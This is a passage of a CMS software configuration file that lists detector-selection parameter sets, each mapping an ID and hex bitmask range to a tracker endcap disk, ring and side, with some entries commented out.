cms.PSet(detSelection=cms.uint32(4112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046020")), # TEC- D1 R1 front
cms.PSet(detSelection=cms.uint32(4121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049020")), # TEC- D2 R1 back
cms.PSet(detSelection=cms.uint32(4122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a020")), # TEC- D2 R1 front
cms.PSet(detSelection=cms.uint32(4131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d020")), # TEC- D3 R1 back
cms.PSet(detSelection=cms.uint32(4132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e020")), # TEC- D3 R1 front
# cms.PSet(detSelection=cms.uint32(4141),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051020")), # TEC- D4 R1 back
# cms.PSet(detSelection=cms.uint32(4142),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052020")), # TEC- D4 R1 front
# cms.PSet(detSelection=cms.uint32(4151),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055020")), # TEC- D5 R1 back
# cms.PSet(detSelection=cms.uint32(4152),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056020")), # TEC- D5 R1 front
# cms.PSet(detSelection=cms.uint32(4161),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059020")), # TEC- D6 R1 back
# cms.PSet(detSelection=cms.uint32(4162),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a020")), # TEC- D6 R1 front
# cms.PSet(detSelection=cms.uint32(4171),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d020")), # TEC- D7 R1 back
# cms.PSet(detSelection=cms.uint32(4172),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e020")), # TEC- D7 R1 front
# cms.PSet(detSelection=cms.uint32(4181),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061020")), # TEC- D8 R1 back
# cms.PSet(detSelection=cms.uint32(4182),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062020")), # TEC- D8 R1 front
# cms.PSet(detSelection=cms.uint32(4191),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065020")), # TEC- D9 R1 back
# cms.PSet(detSelection=cms.uint32(4192),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066020")), # TEC- D9 R1 front
cms.PSet(detSelection=cms.uint32(4211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045040")), # TEC- D1 R2 back
cms.PSet(detSelection=cms.uint32(4212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046040")), # TEC- D1 R2 front
cms.PSet(detSelection=cms.uint32(4221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049040")), # TEC- D2 R2 back
cms.PSet(detSelection=cms.uint32(4222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a040")), # TEC- D2 R2 front
cms.PSet(detSelection=cms.uint32(4231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d040")), # TEC- D3 R2 back
cms.PSet(detSelection=cms.uint32(4232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e040")), # TEC- D3 R2 front
cms.PSet(detSelection=cms.uint32(4241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051040")), # TEC- D4 R2 back
cms.PSet(detSelection=cms.uint32(4242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052040")), # TEC- D4 R2 front
cms.PSet(detSelection=cms.uint32(4251),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055040")), # TEC- D5 R2 back
cms.PSet(detSelection=cms.uint32(4252),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056040")), # TEC- D5 R2 front
cms.PSet(detSelection=cms.uint32(4261),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059040")), # TEC- D6 R2 back
cms.PSet(detSelection=cms.uint32(4262),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a040")), # TEC- D6 R2 front
# cms.PSet(detSelection=cms.uint32(4271),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d040")), # TEC- D7 R2 back
# cms.PSet(detSelection=cms.uint32(4272),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e040")), # TEC- D7 R2 front
# cms.PSet(detSelection=cms.uint32(4281),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061040")), # TEC- D8 R2 back
# cms.PSet(detSelection=cms.uint32(4282),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062040")), # TEC- D8 R2 front
# cms.PSet(detSelection=cms.uint32(4291),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065040")), # TEC- D9 R2 back
# cms.PSet(detSelection=cms.uint32(4292),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066040")), # TEC- D9 R2 front
cms.PSet(detSelection=cms.uint32(4311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045060")), # TEC- D1 R3 back
cms.PSet(detSelection=cms.uint32(4312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046060")), # TEC- D1 R3 front
cms.PSet(detSelection=cms.uint32(4321),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049060")), # TEC- D2 R3 back
cms.PSet(detSelection=cms.uint32(4322),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a060")), # TEC- D2 R3 front
cms.PSet(detSelection=cms.uint32(4331),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d060")), # TEC- D3 R3 back
cms.PSet(detSelection=cms.uint32(4332),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e060")), # TEC- D3 R3 front
cms.PSet(detSelection=cms.uint32(4341),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051060")), # TEC- D4 R3 back
cms.PSet(detSelection=cms.uint32(4342),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052060")), # TEC- D4 R3 front
cms.PSet(detSelection=cms.uint32(4351),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055060")), # TEC- D5 R3 back
cms.PSet(detSelection=cms.uint32(4352),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056060")), # TEC- D5 R3 front
cms.PSet(detSelection=cms.uint32(4361),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059060")), # TEC- D6 R3 back
cms.PSet(detSelection=cms.uint32(4362),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a060")), # TEC- D6 R3 front
cms.PSet(detSelection=cms.uint32(4371),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d060")), # TEC- D7 R3 back
cms.PSet(detSelection=cms.uint32(4372),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e060")), # TEC- D7 R3 front
cms.PSet(detSelection=cms.uint32(4381),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061060")), # TEC- D8 R3 back
cms.PSet(detSelection=cms.uint32(4382),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062060")), # TEC- D8 R3 front
# cms.PSet(detSelection=cms.uint32(4391),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065060")), # TEC- D9 R3 back
# cms.PSet(detSelection=cms.uint32(4392),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066060")), # TEC- D9 R3 front
cms.PSet(detSelection=cms.uint32(4411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045080")), # TEC- D1 R4 back
cms.PSet(detSelection=cms.uint32(4412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c046080")), # TEC- D1 R4 front
cms.PSet(detSelection=cms.uint32(4421),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c049080")), # TEC- D2 R4 back
cms.PSet(detSelection=cms.uint32(4422),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a080")), # TEC- D2 R4 front
cms.PSet(detSelection=cms.uint32(4431),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d080")), # TEC- D3 R4 back
cms.PSet(detSelection=cms.uint32(4432),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e080")), # TEC- D3 R4 front
cms.PSet(detSelection=cms.uint32(4441),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c051080")), # TEC- D4 R4 back
cms.PSet(detSelection=cms.uint32(4442),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c052080")), # TEC- D4 R4 front
cms.PSet(detSelection=cms.uint32(4451),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c055080")), # TEC- D5 R4 back
cms.PSet(detSelection=cms.uint32(4452),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c056080")), # TEC- D5 R4 front
cms.PSet(detSelection=cms.uint32(4461),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c059080")), # TEC- D6 R4 back
cms.PSet(detSelection=cms.uint32(4462),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a080")), # TEC- D6 R4 front
cms.PSet(detSelection=cms.uint32(4471),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d080")), # TEC- D7 R4 back
cms.PSet(detSelection=cms.uint32(4472),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e080")), # TEC- D7 R4 front
cms.PSet(detSelection=cms.uint32(4481),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c061080")), # TEC- D8 R4 back
cms.PSet(detSelection=cms.uint32(4482),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c062080")), # TEC- D8 R4 front
cms.PSet(detSelection=cms.uint32(4491),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c065080")), # TEC- D9 R4 back
cms.PSet(detSelection=cms.uint32(4492),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c066080")), # TEC- D9 R4 front
cms.PSet(detSelection=cms.uint32(4511),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0450a0")), # TEC- D1 R5 back
cms.PSet(detSelection=cms.uint32(4512),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0460a0")), # TEC- D1 R5 front
cms.PSet(detSelection=cms.uint32(4521),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0490a0")), # TEC- D2 R5 back
cms.PSet(detSelection=cms.uint32(4522),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a0a0")), # TEC- D2 R5 front
cms.PSet(detSelection=cms.uint32(4531),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d0a0")), # TEC- D3 R5 back
cms.PSet(detSelection=cms.uint32(4532),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e0a0")), # TEC- D3 R5 front
cms.PSet(detSelection=cms.uint32(4541),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0510a0")), # TEC- D4 R5 back
cms.PSet(detSelection=cms.uint32(4542),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0520a0")), # TEC- D4 R5 front
cms.PSet(detSelection=cms.uint32(4551),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0550a0")), # TEC- D5 R5 back
cms.PSet(detSelection=cms.uint32(4552),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0560a0")), # TEC- D5 R5 front
cms.PSet(detSelection=cms.uint32(4561),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0590a0")), # TEC- D6 R5 back
cms.PSet(detSelection=cms.uint32(4562),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a0a0")), # TEC- D6 R5 front
cms.PSet(detSelection=cms.uint32(4571),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d0a0")), # TEC- D7 R5 back
cms.PSet(detSelection=cms.uint32(4572),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e0a0")), # TEC- D7 R5 front
cms.PSet(detSelection=cms.uint32(4581),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0610a0")), # TEC- D8 R5 back
cms.PSet(detSelection=cms.uint32(4582),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0620a0")), # TEC- D8 R5 front
cms.PSet(detSelection=cms.uint32(4591),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0650a0")), # TEC- D9 R5 back
cms.PSet(detSelection=cms.uint32(4592),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0660a0")), # TEC- D9 R5 front
cms.PSet(detSelection=cms.uint32(4611),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0450c0")), # TEC- D1 R6 back
cms.PSet(detSelection=cms.uint32(4612),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0460c0")), # TEC- D1 R6 front
cms.PSet(detSelection=cms.uint32(4621),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0490c0")), # TEC- D2 R6 back
cms.PSet(detSelection=cms.uint32(4622),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a0c0")), # TEC- D2 R6 front
cms.PSet(detSelection=cms.uint32(4631),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d0c0")), # TEC- D3 R6 back
cms.PSet(detSelection=cms.uint32(4632),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e0c0")), # TEC- D3 R6 front
cms.PSet(detSelection=cms.uint32(4641),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0510c0")), # TEC- D4 R6 back
cms.PSet(detSelection=cms.uint32(4642),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0520c0")), # TEC- D4 R6 front
cms.PSet(detSelection=cms.uint32(4651),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0550c0")), # TEC- D5 R6 back
cms.PSet(detSelection=cms.uint32(4652),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0560c0")), # TEC- D5 R6 front
cms.PSet(detSelection=cms.uint32(4661),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0590c0")), # TEC- D6 R6 back
cms.PSet(detSelection=cms.uint32(4662),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a0c0")), # TEC- D6 R6 front
cms.PSet(detSelection=cms.uint32(4671),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d0c0")), # TEC- D7 R6 back
cms.PSet(detSelection=cms.uint32(4672),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e0c0")), # TEC- D7 R6 front
cms.PSet(detSelection=cms.uint32(4681),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0610c0")), # TEC- D8 R6 back
cms.PSet(detSelection=cms.uint32(4682),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0620c0")), # TEC- D8 R6 front
cms.PSet(detSelection=cms.uint32(4691),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0650c0")), # TEC- D9 R6 back
cms.PSet(detSelection=cms.uint32(4692),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0660c0")), # TEC- D9 R6 front
cms.PSet(detSelection=cms.uint32(4711),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0450e0")), # TEC- D1 R7 back
cms.PSet(detSelection=cms.uint32(4712),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0460e0")), # TEC- D1 R7 front
cms.PSet(detSelection=cms.uint32(4721),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0490e0")), # TEC- D2 R7 back
cms.PSet(detSelection=cms.uint32(4722),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04a0e0")), # TEC- D2 R7 front
cms.PSet(detSelection=cms.uint32(4731),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04d0e0")), # TEC- D3 R7 back
cms.PSet(detSelection=cms.uint32(4732),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c04e0e0")), # TEC- D3 R7 front
cms.PSet(detSelection=cms.uint32(4741),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0510e0")), # TEC- D4 R7 back
cms.PSet(detSelection=cms.uint32(4742),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0520e0")), # TEC- D4 R7 front
cms.PSet(detSelection=cms.uint32(4751),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0550e0")), # TEC- D5 R7 back
cms.PSet(detSelection=cms.uint32(4752),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0560e0")), # TEC- D5 R7 front
cms.PSet(detSelection=cms.uint32(4761),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0590e0")), # TEC- D6 R7 back
cms.PSet(detSelection=cms.uint32(4762),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05a0e0")), # TEC- D6 R7 front
cms.PSet(detSelection=cms.uint32(4771),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05d0e0")), # TEC- D7 R7 back
cms.PSet(detSelection=cms.uint32(4772),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c05e0e0")), # TEC- D7 R7 front
cms.PSet(detSelection=cms.uint32(4781),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0610e0")), # TEC- D8 R7 back
cms.PSet(detSelection=cms.uint32(4782),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0620e0")), # TEC- D8 R7 front
cms.PSet(detSelection=cms.uint32(4791),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0650e0")), # TEC- D9 R7 back
cms.PSet(detSelection=cms.uint32(4792),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0660e0")), # TEC- D9 R7 front
cms.PSet(detSelection=cms.uint32(5111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085020")), # TEC+ D1 R1 back
cms.PSet(detSelection=cms.uint32(5112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086020")), # TEC+ D1 R1 front
cms.PSet(detSelection=cms.uint32(5121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089020")), # TEC+ D2 R1 back
cms.PSet(detSelection=cms.uint32(5122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a020")), # TEC+ D2 R1 front
cms.PSet(detSelection=cms.uint32(5131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d020")), # TEC+ D3 R1 back
cms.PSet(detSelection=cms.uint32(5132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e020")), # TEC+ D3 R1 front
# cms.PSet(detSelection=cms.uint32(51411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091020")), # TEC+ D4 R1 back
# cms.PSet(detSelection=cms.uint32(5142),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092020")), # TEC+ D4 R1 front
# cms.PSet(detSelection=cms.uint32(5151),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095020")), # TEC+ D5 R1 back
# cms.PSet(detSelection=cms.uint32(5152),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096020")), # TEC+ D5 R1 front
# cms.PSet(detSelection=cms.uint32(5161),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099020")), # TEC+ D6 R1 back
# cms.PSet(detSelection=cms.uint32(5162),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a020")), # TEC+ D6 R1 front
# cms.PSet(detSelection=cms.uint32(5171),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d020")), # TEC+ D7 R1 back
# cms.PSet(detSelection=cms.uint32(5172),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e020")), # TEC+ D7 R1 front
# cms.PSet(detSelection=cms.uint32(5181),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1020")), # TEC+ D8 R1 back
# cms.PSet(detSelection=cms.uint32(5182),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2020")), # TEC+ D8 R1 front
# cms.PSet(detSelection=cms.uint32(5191),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5020")), # TEC+ D9 R1 back
# cms.PSet(detSelection=cms.uint32(5192),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6020")), # TEC+ D9 R1 front
cms.PSet(detSelection=cms.uint32(5211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085040")), # TEC+ D1 R2 back
cms.PSet(detSelection=cms.uint32(5212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086040")), # TEC+ D1 R2 front
cms.PSet(detSelection=cms.uint32(5221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089040")), # TEC+ D2 R2 back
cms.PSet(detSelection=cms.uint32(5222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a040")), # TEC+ D2 R2 front
cms.PSet(detSelection=cms.uint32(5231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d040")), # TEC+ D3 R2 back
cms.PSet(detSelection=cms.uint32(5232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e040")), # TEC+ D3 R2 front
cms.PSet(detSelection=cms.uint32(5241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091040")), # TEC+ D4 R2 back
cms.PSet(detSelection=cms.uint32(5242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092040")), # TEC+ D4 R2 front
cms.PSet(detSelection=cms.uint32(5251),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095040")), # TEC+ D5 R2 back
cms.PSet(detSelection=cms.uint32(5252),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096040")), # TEC+ D5 R2 front
cms.PSet(detSelection=cms.uint32(5261),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099040")), # TEC+ D6 R2 back
cms.PSet(detSelection=cms.uint32(5262),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a040")), # TEC+ D6 R2 front
# cms.PSet(detSelection=cms.uint32(5271),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d040")), # TEC+ D7 R2 back
# cms.PSet(detSelection=cms.uint32(5272),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e040")), # TEC+ D7 R2 front
# cms.PSet(detSelection=cms.uint32(5281),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1040")), # TEC+ D8 R2 back
# cms.PSet(detSelection=cms.uint32(5282),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2040")), # TEC+ D8 R2 front
# cms.PSet(detSelection=cms.uint32(5291),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5040")), # TEC+ D9 R2 back
# cms.PSet(detSelection=cms.uint32(5292),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6040")), # TEC+ D9 R2 front
cms.PSet(detSelection=cms.uint32(5311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085060")), # TEC+ D1 R3 back
cms.PSet(detSelection=cms.uint32(5312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086060")), # TEC+ D1 R3 front
cms.PSet(detSelection=cms.uint32(5321),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089060")), # TEC+ D2 R3 back
cms.PSet(detSelection=cms.uint32(5322),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a060")), # TEC+ D2 R3 front
cms.PSet(detSelection=cms.uint32(5331),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d060")), # TEC+ D3 R3 back
cms.PSet(detSelection=cms.uint32(5332),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e060")), # TEC+ D3 R3 front
cms.PSet(detSelection=cms.uint32(5341),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091060")), # TEC+ D4 R3 back
cms.PSet(detSelection=cms.uint32(5342),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092060")), # TEC+ D4 R3 front
cms.PSet(detSelection=cms.uint32(5351),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095060")), # TEC+ D5 R3 back
cms.PSet(detSelection=cms.uint32(5352),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096060")), # TEC+ D5 R3 front
cms.PSet(detSelection=cms.uint32(5361),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099060")), # TEC+ D6 R3 back
cms.PSet(detSelection=cms.uint32(5362),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a060")), # TEC+ D6 R3 front
cms.PSet(detSelection=cms.uint32(5371),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d060")), # TEC+ D7 R3 back
cms.PSet(detSelection=cms.uint32(5372),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e060")), # TEC+ D7 R3 front
